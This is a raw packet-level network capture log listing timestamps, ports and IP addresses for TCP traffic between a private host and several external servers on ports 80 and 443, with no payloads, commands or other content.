Sep 21, 2024 14:48:10.491436958 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491439104 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.491449118 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491461039 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.491461039 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491475105 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491483927 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.491487026 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491498947 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.491499901 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491513014 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491525888 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491527081 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.491538048 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491547108 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.491553068 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491564989 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491573095 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.491576910 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491590977 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491601944 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.491621017 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.491642952 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.491667986 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491688967 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491699934 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491712093 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.491713047 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491723061 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.491725922 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491739035 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491748095 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.491750956 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491761923 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.491764069 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491777897 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491787910 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491790056 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.491801023 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491810083 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.491813898 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491836071 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491846085 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491852045 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491859913 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.491863012 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491869926 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491879940 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491893053 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491893053 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.491904974 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.491913080 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491929054 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491938114 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.491942883 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491949081 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.491959095 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491971970 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491974115 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.492002010 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.492002010 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.492017031 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.492022991 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.492028952 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.492029905 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.492034912 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.492042065 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.492048025 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.492054939 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.492106915 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.492728949 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.492742062 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.492755890 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.492775917 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.492804050 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.492808104 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.492820978 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.492829084 CEST	443	49726	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:10.492834091 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.492845058 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.492854118 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.492856026 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.492901087 CEST	49726	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:10.494461060 CEST	443	49729	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:10.494505882 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.494569063 CEST	49729	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:10.495078087 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.495090961 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.495102882 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.495135069 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.495137930 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.495146990 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.495158911 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.495166063 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.495177984 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.495188951 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.495193005 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.495199919 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.495220900 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.495225906 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.495234966 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.495245934 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.495246887 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.495270014 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.495277882 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.495289087 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.495296955 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.495300055 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.495311022 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.495322943 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.495327950 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.495347977 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.495353937 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.495367050 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.495373011 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.495392084 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.495404005 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.495412111 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.495412111 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.495415926 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.495428085 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.495429993 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.495449066 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.495466948 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.495536089 CEST	49725	443	192.168.2.9	185.166.143.48
Sep 21, 2024 14:48:10.495640993 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.495652914 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.495663881 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.495682001 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.495695114 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.495708942 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.495713949 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.495728016 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.495734930 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.495739937 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.495753050 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.495760918 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.495764971 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.495778084 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.495781898 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.495806932 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.495816946 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.495856047 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.495870113 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.495881081 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.495893002 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.495904922 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.495907068 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.495918036 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.495930910 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.495934010 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.495944023 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.495953083 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.495978117 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.496005058 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.496012926 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496023893 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496035099 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496045113 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496057034 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496063948 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.496068954 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496093988 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.496093988 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496107101 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496114016 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.496119022 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496129990 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496141911 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.496153116 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496161938 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.496165991 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496175051 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496186972 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496189117 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.496198893 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496208906 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496212006 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.496221066 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496232986 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496237993 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.496265888 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496268034 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.496278048 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496280909 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.496298075 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496309042 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496309042 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.496319056 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496330023 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496331930 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.496341944 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496352911 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496352911 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.496365070 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496376991 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496381044 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.496400118 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.496402979 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496413946 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496416092 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.496424913 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496437073 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496447086 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.496448040 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496459961 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496465921 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.496481895 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496485949 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.496496916 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496507883 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496511936 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.496520042 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496531010 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496550083 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.496552944 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496563911 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496576071 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496578932 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.496584892 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496603012 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.496614933 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496623993 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.496628046 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496648073 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496654987 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.496659994 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496671915 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496680021 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.496685982 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496696949 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496700048 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.496711016 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496722937 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496728897 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.496742964 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.496789932 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.496809959 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496822119 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496833086 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496845007 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496855974 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496864080 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.496869087 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496879101 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.496900082 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.496907949 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496918917 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496923923 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.496932030 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.496967077 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.496978045 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.496995926 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.497008085 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.497016907 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.497030973 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.497036934 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.497055054 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.497078896 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.498991013 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.500425100 CEST	49729	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:10.500444889 CEST	443	49729	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:10.500694990 CEST	443	49729	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:10.502602100 CEST	49726	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:10.502612114 CEST	443	49726	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:10.502643108 CEST	49729	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:10.503058910 CEST	443	49726	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:10.503084898 CEST	49729	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:10.503108978 CEST	49726	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:10.503371000 CEST	49726	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:10.503751040 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.526221991 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.526241064 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.526252985 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.526264906 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.526276112 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.526293993 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.526304007 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.526310921 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.526319027 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.526324034 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.526344061 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.526370049 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.526382923 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.526393890 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.526407003 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.526434898 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.526470900 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.526484013 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.526493073 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.526496887 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.526511908 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.526521921 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.526524067 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.526541948 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.526555061 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.526575089 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.526577950 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.526590109 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.526602983 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.526627064 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.526642084 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.526689053 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.526700974 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.526714087 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.526725054 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.526736021 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.526762962 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.527704000 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.527731895 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.527744055 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.527784109 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.527785063 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.527795076 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.527798891 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.527817965 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.527829885 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.527837038 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.527861118 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.527877092 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.527909994 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.527921915 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.527931929 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.527964115 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.527982950 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.527985096 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.527996063 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.528016090 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.528026104 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.528038979 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.528048038 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.528052092 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.528054953 CEST	49713	80	192.168.2.9	176.113.115.33
